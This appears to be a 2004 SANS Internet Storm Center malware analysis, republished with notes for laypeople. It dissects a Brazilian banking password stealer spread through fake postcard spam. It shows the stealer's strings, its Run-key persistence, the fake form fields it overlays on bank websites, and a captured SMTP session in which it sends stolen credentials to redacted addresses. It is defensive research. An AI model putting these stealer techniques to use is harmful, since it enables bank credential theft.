some minor informational notes were added for the layman.

Info from SANS http://isc.sans.org/     Important notes for laymen are colored text red blue and green.  You can skip the technical text in black.

NOTE the Virus below was not detected by the 13 major virus companies.

Handlers Diary December 14th 2004

Updated December 14th 2004 23:00 UTC (Handler: Pedro Bueno)

 

You got a Postcard!

Bellow is a simple malware analysis of a password stealer. This is becoming really common these days on Brazil. The miscreants are sending phishings of Brazilian Postcards websites and delivering thousands of them on users mailboxes. This one came to mine as a warning "Your partner is cheating you, see the pictures bellow!"...This simple analysis was done with the free tools available for Linux and Windows.
On Linux: Strings, UPX, Unrar
On Windows: Sysinternals tool / ZoneAlarm Free

Introduction:

A suspicious file was received on Nov 30 though a spam mail with a subject of ´Your partner is cheating you - see the pictures!' (in portuguese). Sending it to VirusTotal, showed that none of the 13 AV vendors were recognizing it as a malware. Malware is Malicious Software.
So, I decided to analyze it to see what I could find on that one.
#####################
Phase 1: The Binary
#####################

Binary: fotos.sfx.exe
#strings -a:
-------------SNIP!------------------------
This program must be run under Win32
UPX0
UPX1
.rsrc
1.20
UPX!
W!jfVB!
-------------SNIP!------------------------

The first lines show interesting information: UPX. UPX is a very common Packer used to compact the PE´s. You can use UPX to pack and unpack files.

#upx -d fotos.sfx.exe -o fotos.sfx.unp.exe

#strings -a fotos.sfx.unp.exe -e -l |more

-------------SNIP!------------------------
No to A&ll
&Cancel
WinRAR self-extracting archive
-------------SNIP!------------------------

--> So, it is compressed with WinRAR To decompress you can use Unrar:
$ unrar x -v fotos.sfx.unp.exe

-------------SNIP!------------------------
UNRAR 2.71 freeware Copyright (c) 1993-2000 Eugene Roshal


Extracting from fotos.sfx.unp.exe

Unknown method in fotos.exe
Skipping fotos.exe
No files to extract
-------------SNIP!------------------------

--> One problem...Version 2.71 does not support sfx scripts
SFX = Self eXtracting Files

So, I had to upgraded to 3.40
# ./unrar x -v ../fotos.sfx.unp.exe

-------------SNIP!------------------------
UNRAR 3.41 freeware Copyright (c) 1993-2004 Alexander Roshal


Extracting from ../fotos.sfx.unp.exe

;The comment below contains SFX script commands

Path=C:\Windows\system32
SavePath
Setup=fotos.exe
Silent=2 (Hide start dialog)
Overwrite=2 (skip existing files)


Extracting fotos.exe OK
All OK
-------------SNIP!------------------------

About the comments above, those are parameters that you set when creating RAR files with sfx.In this case:
Silent=2 means the option 'Hide start dialog'
Overwrite=2 means the option 'skip existing files'


#####################
Phase 1: Results
#####################

- There are NO pictures on that file...:)
- It is an application
- It was packed with UPX
- It was compressed with WinRar with SFX commands

#####################
Phase 2: Analysis
#####################

Strings now shows some more interesting stuff...

Network Information:

-------------SNIP!------------------------
Network unreachable.
Host unreachable.
Connection refused.
TTL expired.
Network is down.
Network is unreachable. Net dropped connection or reset.!Software caused connect ion abort.
Connection reset by peer.
-------------SNIP!------------------------

Registry Information:

-------------SNIP!------------------------
\Software\Microsoft\Windows\CurrentVersion\Run
-------------SNIP!------------------------

-->So, looks like it will put itself at that registry key...

Application information:

-------------SNIP!------------------------
SOFTWARE\Borland\Delphi\RTL
-------------SNIP!------------------------

-->Delphi Run Time Library...a delphi application...

Mail strings:

-------------SNIP!------------------------
This is a multi-part message in MIME format
=_NextPart_2relrfksadvnqindyw3nerasdf
=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: multipart/alternative;
boundary="=_NextPart_2altrfkindysadvnqw3nerasdf"
--=_NextPart_2altrfkindysadvnqw3nerasdf
--=_NextPart_2altrfkindysadvnqw3nerasdf--
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
base64
attachment
application/octet-stream
Content-Type:
-------------SNIP!------------------------

--> So, this application will send email...?

And some others strings of interest:

-------------SNIP!------------------------
=============Banco do Brasil====================== ==================================================
BB Tit.=
BB Ag
nc.=
BB Cont.=
BB Senha A.=Atendimento=
BB Senha C.=
=============Banco Bradesco=======================
Bradesco Agencia=
Bradesco Conta=
Bradesco Digito=
Bradesco 4 digitos=
Bradesco Cartao=
Bradesco Resposta s.=
==============Caixa Economica=====================
Caixa Tipo=
Caixa Agencia=
Caixa Conta=
Caixa S. Intermet=
Caixa Ass. Eletronica=
=============Unibanco===========================
Unibanco 30 horas=
Unibanco Agencia=
Unibanco Conta=
Unibanco Digito=
Unibanco Senha=
Unibanco Assinatura=
Unibanco Cond. Alfanumerica=
=============Banco ITAU===========================
ITAU Conta=
ITAU Agencia=
ITAU Digito=
ITAU Senha Eletronica=
ITAU Senha do cartao=
ITAU % digitos do cartao=
ITAU Data dia=
ITAU Data mes=
ITAU Data ano=
ITAU Numero do portador=
-------------SNIP!------------------------
--> These are names of some brazilian banks. Basic portuguese: Agencia means Branch, Conta means Account and Senha means Password.
and also:

-------------SNIP!------------------------
Conta em braco!
Senha em braco!
Senha do Auto-Atendimento
-------------SNIP!------------------------

--> More portuguese lessons:
-Blank Account field!
-Blank Password field!
-ATM Password
--> and this is still funny because they wrote it wrong...the correct would be ´branco´ and not ´braco´...

And finally, some email address:
- xxxxx1@yahoo.com.br
- xxxxx2@yahoo.com.br
- xxxxx3@yahoo.com.br
- xxxxx1@bol.com.br
- xxxxx1@tugamail.com
- xxxxxx@xxxxxx
and an IP address:
- xx.xx.80.21

#####################
Phase 2: Results
#####################

- This application will try to use the network resources
- Will use something on \Software\Microsoft\Windows\CurrentVersion\Run
- Was created with Delphi
- Is related in some way to email...
- Has some string with names of Brazilian Banks and strings that asks for passwords in a format of report.
- Has a list of 7 email addresses and one IP address

Putting all together we can assume that it is one password stealer, which will send passwords to some email addresses...correct?

#####################
Phase 3: Running...
#####################

To confirm my assumptions, I decided to run this malware onto a Win2k machine. And, besides the fact that we didnt find any references of VM detection, it will be running in a real Win2k machine.

-------------SNIP!------------------------
D:\virus\fotos.sfx.unp.unr.exe>fotos.exe

D:\virus\fotos.sfx.unp.unr.exe>
-------------SNIP!------------------------


Our good friend Regmon, shows this:

-------------SNIP!------------------------
fotos.exe:1888 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS
fotos.exe:1888 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos SUCCESS "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"
fotos.exe:1888 CloseKey HKLM\Software\Microsoft\Windows\CurrentVersion\Run SUCCESS
-------------SNIP!------------------------


That means that our process fotos.exe, used the method createKey() to create a new key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, also the method setValue() to create the values of the name and value of the new key, like the value "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe" at HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos
Another friend, Process Explorer, shows also good information:

-------------SNIP!------------------------
HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\Protocol_Catalog9
HKLM\SYSTEM\ControlSet002\Services\WinSock2\Parameters\NameSpace_Catalog5
-------------SNIP!------------------------

All the above technical information explains how the virus/malware has invaded your computer and hijacked the internet so as to direct you to fake imposter websites of banks so as to collect your information.
Winsock...interesting. We knew that this application would try to use the network resources and this confirmed...

So, lets try to browse to any of those banks websites...
Navigating to one of those bank websites using IE was kind of funny...
I dont know if it was because of the IE google bar, but The real website loaded almost perfectly, except because there was another pair of branch and account overlapping the real one...
Putting fake data on the fields or just not putting anything at all, and pressing OK, made it open another window, requesting more data, more passwords and personal information. After filling everything with some ´good data´ and pressing ok, my ZoneAlarm came out with an alert:

-------------SNIP!------------------------
Do you want to allow fotos.exe to access the internet?
Technical Information
Destination IP: xx.xx.80.21:SMTP
Application: fotos.exe
-------------SNIP!------------------------


hummm...so that’s the why we had this IP address on that list...SMTP, email addresses...now it is starting to make sense...:)
But the xx.xx.80.21 resolves to a hosting providers...not any of the emails domains that we found...Maybe an Open relay??

#####################
Phase 3: Results
#####################

So, thats what we got so far:

- It will create a key with the name and value of HKLM\Software\Microsoft\Windows\CurrentVersion\Run\fotos , "D:\virus\fotos.sfx.unp.unr.exe\fotos.exe"
- It will use Winsock for network resources
- It will put create fake fields for passwords, account, branch and some personal information, overlapping the real fields of the bank websites
- It will try to access an smtp server at the IP that we found some steps ago...
For now on, we should think about this application much like as a Spyware. As we could notice,

this application uses Winsock. There is a lot of advantages to hook itself to WinSock. In Microsoft Windows Operating Systems, Winsock is the way that it implements TCP/IP. This is wonderful of the hacker, because in this way his/hers application will be able to monitor all Internet traffic! And thats exactly what he wants! He wants to know when you will access the Banks websites!

############################
Phase 4: Final experiments
############################

So, lets setup a mail server and see what this application is trying to send to that IP.
On another machine in the same lab network, I brought up a virtual interface with the same IP address of machine that ZoneAlarm detected, and repeated the steps of phase 2, visiting the websites and filling the fake forms. After pressing the last OK, ZoneAlarm alerted me again, and this time I Allowed it to connect to the port 25 of the IP address.
My mail server made all the transaction, which was reproduced bellow with the help of another friend, Ethereal:

-------------SNIP!------------------------------------------------------
220 localhost.localdomain ESMTP Sendmail 8.12.10/8.12.10; Tue, 30 Nov 2004 17:32:53 -0200
EHLO starinfo
250-localhost.localdomain Hello starinfo [10.0.0.2], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-DELIVERBY
250 HELP
RSET
250 2.0.0 Reset state

MAIL FROM:<xxxxxx1@bol.com.br>
250 2.1.0 <xxxxxx1@bol.com.br>... Sender ok
RCPT TO:<xxxxxx1@yahoo.com.br>
250 2.1.5 <xxxxxx1@yahoo.com.br>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: xxxxxx1@bol.com.br
Subject: xxxxxx1
To: xxxxxx1@yahoo.com.br
Content-Type: text/plain
Date: Tue, 30 Nov 2004 17:33:02 -0200
X-Priority: 3
X-Library: Indy 9.00.10
=============Banco do Brasil====================== ==================================================
BB Tit.= 1. Titular
BB Ag.nc.=
BB Cont.=
BB Senha A.=Atendimento=
BB Senha C.=
================================================== =============Banco Bradesco=======================
Bradesco Agencia=
Bradesco Conta=
Bradesco Digito=
Bradesco 4 digitos=
Bradesco Cartao=
Bradesco Resposta s.=
================================================== ==============Caixa Economica=====================
Caixa Tipo= 001-Cta. Corrente - P.F.sica
Caixa Agencia=
Caixa Conta=
Caixa S. Intermet=
Caixa Ass. Eletronica=
================================================== =============Unibanco===========================
Unibanco 30 horas=Internet 30 Horas
Unibanco Agencia=3333
Unibanco Conta=333333
Unibanco Digito=1
Unibanco Senha=1111
Unibanco Assinatura=123123123123123123123
Unibanco Cond. Alfanumerica=zaqxsw
================================================== =============Banco ITAU===========================
ITAU Conta=
ITAU Agencia=
ITAU Digito=
ITAU Senha Eletronica=
ITAU Senha do cartao=
ITAU % digitos do cartao=
ITAU Data dia=
ITAU Data mes=
ITAU Data ano=
ITAU Numero do portador=
================================================== =============GErenciador Financeiro===============
Gerenciador Chave=
Gerenciador Senha Acesso=
Gerenciador Senha Conta=
================================================= ============ufaaa acabo :D=======================
.
250 2.0.0 iAUJWrLK000991 Message accepted for delivery
QUIT
221 2.0.0 localhost.localdomain closing connection
-------------SNIP!--------------------------------------------------

Yep...it was sending a report with all the info gathered...
Interesting stuff...in the last line of his/hers report, it is ´ufaaa acabo´. This means: "finally, the end"...

########################
Phase 4: Final Results
########################

- Our assumptions had been proven to be right, and this piece of malware was sending the results, through a relay, to those email addresses with all user information, as account, branch, passwords...
And finally, after sending this malware to a list of AV vendors, on the end of today, according to Virustotal, 3 AV were already detecting it!


--------------------------------------------------------------------
Handler on Duty for the last time this year: Pedro Bueno (pbueno /AT/ isc.sans.org)